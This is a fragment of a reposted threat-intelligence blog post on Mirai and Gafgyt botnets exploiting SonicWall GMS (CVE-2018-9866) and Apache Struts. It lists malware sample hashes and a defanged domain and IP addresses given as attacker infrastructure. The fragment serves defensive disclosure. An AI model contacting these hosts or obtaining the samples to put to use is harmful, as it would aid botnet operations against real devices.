ae2354a5d8b84fb6ea6fc4b9ca3060959d5c0c77684cd2100731df2a3c7a204e

1913cf8e65114136cc309e72c384b717f0aeaaeae0c040188648c4afebce1669

 

Samples with Sonicwall GMS exploit CVE-2018-9866

1814c010f5e7391c7ea38850f9caf0771866e315f8d0c58c563818e71d30c208

29540468514cd48b6c2571722018dffb49d12f99c95b248a44a1455fff01acfb

39891a1c13e4e6ec9de410201f697d23c05e83a29ec0010c6c62c6829386e6a6

596270e91ccee3ec04a552bafde586af127ecac7141852edb9707ac6c4779a99

68b27935c7d064478339f7d95b57ff06ffa1efbd81009b4a2870c5cf3e0b0b35

92a4c6ae034c3a03c21b74bdc00264192e60a85deedd90b99a3e350758eb85c1

aab0ec600cdf57f28f9480ff3a9d3547f699af005c015b74c5c9e39a992570b6

d8fbf6d68993045b4840729c788665ab10c50c42b27246a290031664f3b956eb

dafe1b513183902692c8ba8b2a95fede7c13937e49bf21294de448df05edff18

f89d742c4d3312ac9bd707a9135235482c554e369cb646dcd97f6a14b4210136

fab034d705b3ad7a10101858daf5da93a88f8bfd509dee9b8072678b27290ed3

Infrastructure

l[.]ocalhost[.]host

185[.]10[.]68[.]213

185[.]10[.]68[.]127

The post Multi-exploit IoT/Linux Botnets Mirai and Gafgyt Target Apache Struts, SonicWall appeared first on Palo Alto Networks Blog.

Go to Source
Author: Ruchna Nigam